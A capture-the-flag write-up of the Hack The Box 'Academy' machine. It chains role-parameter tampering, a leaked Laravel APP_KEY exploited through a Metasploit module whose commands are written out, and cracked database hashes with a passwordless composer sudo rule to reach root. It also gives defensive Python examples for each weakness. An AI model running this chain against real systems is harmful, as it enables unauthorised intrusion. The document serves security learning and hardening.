In this blog post, I'll share my experience tackling the "Academy" machine on Hack The Box. This Capture the Flag (CTF) challenge, created by egre55 and mrb3n, involves exploiting a web application's vulnerabilities to gain initial access and escalating privileges to obtain root access.
The primary vulnerabilities exploited in this challenge include:
Parameter Tampering: The web application allows users to manipulate parameters during registration, enabling unauthorized access to administrative functionalities.
Insecure Deserialization leading to Remote Code Execution (RCE): The application uses the Laravel PHP framework with an exposed APP_KEY. Because that key is what the framework uses to sign and encrypt its tokens, anyone holding it can craft a token the application trusts and unserializes, which leads to remote code execution.
Weak Password Storage: User credentials are stored in a database with weak hashing mechanisms, making them susceptible to cracking.
Insecure Sudo Permissions: Certain binaries, such as composer, can be executed with elevated privileges without requiring a password, facilitating privilege escalation.
These vulnerabilities highlight the importance of implementing proper input validation, securing sensitive application keys, using strong password hashing algorithms, and carefully configuring sudo permissions to prevent unauthorized access and privilege escalation.
I began by performing an Nmap scan to identify open ports and services on the target machine. The scan revealed that port 80 (HTTP) was open, and the service attempted to redirect to http://academy.htb/. To access this domain, I added an entry to my /etc/hosts file.
Upon accessing http://academy.htb in my browser, I found a registration page. Using Burp Suite to intercept the registration request, I noticed a parameter named roleid with a default value of 0. I modified this value to 1 to test for elevated privileges.
After registering with roleid=1, I gained access to an admin panel. Further directory brute-forcing using dirb revealed an admin.php page, which displayed a hostname: dev-staging-01.academy.htb. I added this hostname to my /etc/hosts file.
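The roleid tampering above is a textbook mass-assignment bug: the server copies whatever fields the client submits into the new account. The following Python is an added example, not code from the original post or from the Academy application, that models the vulnerable registration handler beside a hardened one. The field names, role ids and request bodies are assumptions made for illustration.

```python
# Added example (not code from the original post): the root cause of the
# roleid tampering, modelled as a vulnerable registration handler beside a
# hardened one. Field names, role ids and request bodies are assumptions.
from dataclasses import dataclass

ROLE_USER = 0
ROLE_ADMIN = 1

# Constructed request bodies as a web framework would hand them to the
# handler. The hidden roleid=0 field mirrors what the post saw in Burp; the
# second body is the same request with that field changed by the client.
NORMAL_REGISTRATION = {"username": "alice", "password": "correct horse", "roleid": "0"}
TAMPERED_REGISTRATION = {"username": "mallory", "password": "battery staple", "roleid": "1"}

# Only these fields may come from the client during self-registration.
ALLOWED_REGISTRATION_FIELDS = frozenset({"username", "password"})


@dataclass
class User:
    username: str
    password: str   # kept as-is here; password hashing is a separate concern
    roleid: int


def register_vulnerable(form: dict) -> User:
    """Mass assignment: every submitted field, roleid included, is trusted."""
    return User(
        username=form["username"],
        password=form["password"],
        roleid=int(form.get("roleid", ROLE_USER)),
    )


def unexpected_fields(form: dict) -> set:
    """Fields the client sent that the registration form never exposes;
    worth logging, because an unmodified browser submission never adds any."""
    return set(form) - ALLOWED_REGISTRATION_FIELDS


def register_hardened(form: dict) -> User:
    """Copies only allow-listed fields; the role is decided server-side and
    can be raised later only by an already-authenticated administrator."""
    extra = unexpected_fields(form)
    if extra:
        # In a real application this goes to the security log with the client IP.
        print(f"registration ignored unexpected fields: {sorted(extra)}")
    return User(
        username=form["username"],
        password=form["password"],
        roleid=ROLE_USER,
    )


def promote(actor: User, target: User) -> User:
    """Role changes are a separate, authorised action, never part of signup."""
    if actor.roleid != ROLE_ADMIN:
        raise PermissionError("only administrators can change roles")
    target.roleid = ROLE_ADMIN
    return target


if __name__ == "__main__":
    print(register_vulnerable(TAMPERED_REGISTRATION))   # roleid=1: admin for free
    print(register_hardened(TAMPERED_REGISTRATION))     # roleid=0: tampering ignored
```

The hardened handler never reads roleid from the request at all; an allow-list of accepted fields is more robust than a deny-list of dangerous ones, and logging the unexpected fields gives a detection signal for tampering attempts.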
Accessing http://dev-staging-01.academy.htb resulted in an internal server error, but the response headers indicated that the application was using the Laravel framework. Inspecting the page source revealed an APP_KEY in base64 format.
I searched for Laravel exploits using searchsploit and found an unserialize RCE exploit available in Metasploit. I configured the exploit with the target's IP address, the extracted APP_KEY, and the virtual host dev-staging-01.academy.htb:
use exploit/unix/http/laravel_token_unserialize_exec
set rhosts 10.129.106.234
set lhost <your_ip>
set APP_KEY <extracted_app_key>
set vhost dev-staging-01.academy.htb
exploit
This provided a shell as the www-data user.
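The staging host only became exploitable because a debug page handed out the APP_KEY. The following Python is an added example, not code from the original post or from Laravel, of a check a team could run in CI or against error responses to catch that class of leak: it scans a response body for framework secrets and for debug mode left on. The HTML body is constructed in the style of a framework error page, the key in it is an obvious placeholder, and the list of secret variable names is an assumption.

```python
# Added example (not code from the original post): a check that an HTTP
# response body does not expose framework secrets, the kind of leak the post
# found on the dev-staging host. The body below is constructed and the key
# value is a placeholder, not the machine's APP_KEY.
import re

# Constructed body in the style of a framework error page that dumps the
# environment when debug mode is left on.
CONSTRUCTED_DEBUG_PAGE = """\
<html><body><h1>Whoops, looks like something went wrong.</h1>
<table class="env">
<tr><td>APP_NAME</td><td>Laravel</td></tr>
<tr><td>APP_ENV</td><td>local</td></tr>
<tr><td>APP_KEY</td><td>base64:PLACEHOLDERKEYPLACEHOLDERKEYPLACEHOLDERKEY0=</td></tr>
<tr><td>APP_DEBUG</td><td>true</td></tr>
<tr><td>DB_USERNAME</td><td>app</td></tr>
<tr><td>DB_PASSWORD</td><td>constructed-db-password</td></tr>
</table></body></html>
"""

# Environment variables whose values must never appear in a response
# (assumed list; extend it for the frameworks and services you run).
SECRET_NAMES = ("APP_KEY", "DB_PASSWORD", "REDIS_PASSWORD", "MAIL_PASSWORD", "AWS_SECRET_ACCESS_KEY")

# A name is followed either by the next table cell (HTML dump) or by an
# '=' / ':' separator (dotenv or plain-text dump); the value runs to the
# next tag, quote or line end.
SEP = r"(?:\s*</t[dh]>\s*<t[dh][^>]*>\s*|\s*[=:]\s*)"
SECRET_RES = [(n, re.compile(rf"\b{n}\b{SEP}(?P<value>[^<\n\"']+)")) for n in SECRET_NAMES]
# Laravel application keys are stored as base64:<32 random bytes>; catch
# one even when its variable name is missing.
LARAVEL_KEY_RE = re.compile(r"base64:[A-Za-z0-9+/]{40,}={0,2}")
DEBUG_ON_RE = re.compile(r"\bAPP_DEBUG\b" + SEP + r"true\b")


def redact(value: str) -> str:
    """Keeps only a short prefix so findings can be logged without the secret."""
    return value[:6] + "***" if len(value) > 6 else "***"


def find_leaked_secrets(body: str) -> list:
    """Returns findings sorted by position in the body, each with the
    variable name (or 'laravel-style key') and a redacted value."""
    hits = {}
    spans = []
    for name, rx in SECRET_RES:
        for m in rx.finditer(body):
            hits[m.start()] = {"name": name, "redacted": redact(m["value"].strip())}
            spans.append((m.start(), m.end()))
    for m in LARAVEL_KEY_RE.finditer(body):
        # Skip keys already reported as the value of a named variable.
        if not any(s <= m.start() < e for s, e in spans):
            hits[m.start()] = {"name": "laravel-style key", "redacted": redact(m.group(0))}
    return [hits[p] for p in sorted(hits)]


def debug_mode_exposed(body: str) -> bool:
    """True when the response itself says APP_DEBUG is on."""
    return DEBUG_ON_RE.search(body) is not None


def response_is_safe(body: str) -> bool:
    """Single verdict for a CI assertion or a response-monitoring hook."""
    return not find_leaked_secrets(body) and not debug_mode_exposed(body)


if __name__ == "__main__":
    for hit in find_leaked_secrets(CONSTRUCTED_DEBUG_PAGE):
        print(f"leaked {hit['name']}: {hit['redacted']}")
    print("debug mode exposed:", debug_mode_exposed(CONSTRUCTED_DEBUG_PAGE))
```

The mitigation the check enforces is the usual one: APP_DEBUG off outside local development, the .env file outside the web root, and a key rotation whenever a key may have been seen, since every token signed with the old key stays valid until then.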
Within the web directory, I found a .env file containing database credentials. Using these credentials, I accessed the MySQL database and retrieved user hashes. I cracked the hash for the user cry0l1t3 using john and logged in as this user, obtaining the user flag.
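A hash that john cracks in minutes is one that was stored without a salt or a work factor. The following Python is an added example, not code from the original post, that puts an unsalted MD5 scheme beside a salted, iterated PBKDF2 scheme and shows the upgrade-on-login pattern that retires weak records as users authenticate. PBKDF2 is used because it is in the standard library; Laravel's own default is bcrypt. The usernames, passwords and the stored-string layout are assumptions for this example.

```python
# Added example (not code from the original post): weak unsalted MD5 storage
# beside salted, iterated PBKDF2 with transparent upgrade on login.
# Usernames, passwords and the record layout below are constructed.
import hashlib
import hmac
import os
from typing import Optional

PBKDF2_ITERATIONS = 600_000   # OWASP Password Storage Cheat Sheet figure for PBKDF2-HMAC-SHA256
SALT_BYTES = 16


def hash_legacy_md5(password: str) -> str:
    """Weak storage: no salt, no work factor. Identical passwords give
    identical hashes and each candidate costs one MD5 during cracking."""
    return hashlib.md5(password.encode()).hexdigest()


def hash_pbkdf2(password: str, salt: Optional[bytes] = None) -> str:
    """Stores algorithm, iteration count, salt and derived key together, so
    the parameters can be raised later without breaking existing records."""
    salt = salt if salt is not None else os.urandom(SALT_BYTES)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return f"pbkdf2_sha256${PBKDF2_ITERATIONS}${salt.hex()}${dk.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Verifies either record format; the comparison is constant-time in both."""
    if "$" not in stored:                       # legacy unsalted MD5 record
        return hmac.compare_digest(hash_legacy_md5(password), stored)
    parts = stored.split("$")
    if len(parts) != 4 or parts[0] != "pbkdf2_sha256":
        return False
    _, iters, salt_hex, dk_hex = parts
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)


def needs_rehash(stored: str) -> bool:
    """True for legacy records and for records below the current iteration count."""
    if "$" not in stored:
        return True
    return int(stored.split("$")[1]) < PBKDF2_ITERATIONS


def login(users: dict, username: str, password: str) -> bool:
    """Authenticates and upgrades weak records on success, so a later
    database leak exposes only slow, salted hashes. The plaintext is only
    available at login time, which is why the upgrade happens here."""
    stored = users.get(username)
    if stored is None or not verify_password(password, stored):
        return False
    if needs_rehash(stored):
        users[username] = hash_pbkdf2(password)
    return True


if __name__ == "__main__":
    users = {"alice": hash_legacy_md5("constructed-password")}   # constructed legacy record
    print("before:", users["alice"])
    print("login ok:", login(users, "alice", "constructed-password"))
    print("after: ", users["alice"][:40] + "...")
```

Records that never log in again stay weak, so a migration should also force a reset for accounts still on the legacy format after a cut-off date.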
To escalate privileges, I uploaded and executed LinPEAS for enumeration. I discovered logs containing credentials for the user mrb3n. After logging in as mrb3n, I checked sudo permissions and found that composer could be run as root without a password. I exploited this misconfiguration to spawn a root shell and obtained the root flag.
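The root step relied on a single sudoers line, and that line is something a configuration audit can catch before an attacker does. The following Python is an added example, not code from the original post, that parses sudoers-style user specifications and flags passwordless rules that run as root. The rule text is constructed; /usr/bin/composer is an assumed path, since the post names only the binary; aliases and #include directives are not handled.

```python
# Added example (not code from the original post): an audit of sudoers-style
# rules that flags passwordless root execution, the misconfiguration the post
# found for composer. The rule text is constructed and the composer path is
# an assumption.
import re

SAMPLE_SUDOERS = """\
# constructed /etc/sudoers excerpt for this example
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
mrb3n   ALL=(ALL) NOPASSWD: /usr/bin/composer
deploy  ALL=(root) NOPASSWD: /usr/bin/systemctl restart nginx
backup  ALL=(backup) NOPASSWD: /usr/local/bin/run-backup.sh
"""

# user  host=(runas_user[:runas_group]) [TAG: ...] command[, command...]
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\))?\s*(?P<spec>.+)$"
)


def parse_rules(text: str) -> list:
    """Returns one dict per user specification; comments, blank lines and
    Defaults lines are skipped."""
    rules = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        tokens = m["spec"].split()
        tags = set()
        # Leading upper-case tokens ending in ':' are tags such as NOPASSWD:
        while tokens and tokens[0].endswith(":") and tokens[0][:-1].isupper():
            tags.add(tokens.pop(0)[:-1])
        commands = [c.strip() for c in " ".join(tokens).split(",")]
        # Without a (runas) clause sudo runs the command as root.
        runas = (m["runas"] or "root").split(":")[0]
        rules.append({"user": m["user"], "runas": runas, "tags": tags, "commands": commands})
    return rules


def runs_as_root(runas: str) -> bool:
    return runas in ("ALL", "root")


def audit_sudoers(text: str) -> list:
    """Findings: NOPASSWD rules that execute as root. The named binary is
    deliberately not allow-listed: many programs can be made to run other
    commands (the post shows this for composer), so a passwordless root
    rule is a finding whatever it points at. ALL is rated critical."""
    findings = []
    for r in parse_rules(text):
        if "NOPASSWD" in r["tags"] and runs_as_root(r["runas"]):
            for cmd in r["commands"]:
                severity = "critical" if cmd == "ALL" else "high"
                findings.append({"user": r["user"], "command": cmd, "severity": severity})
    return findings


if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        print(f"[{f['severity']}] {f['user']} may run '{f['command']}' as root without a password")
```

On a live host the same logic applies to /etc/sudoers.d/* and to the output of sudo -l for each account; the backup rule passes because it runs as an unprivileged user, which is the shape a passwordless rule should have when one is genuinely needed.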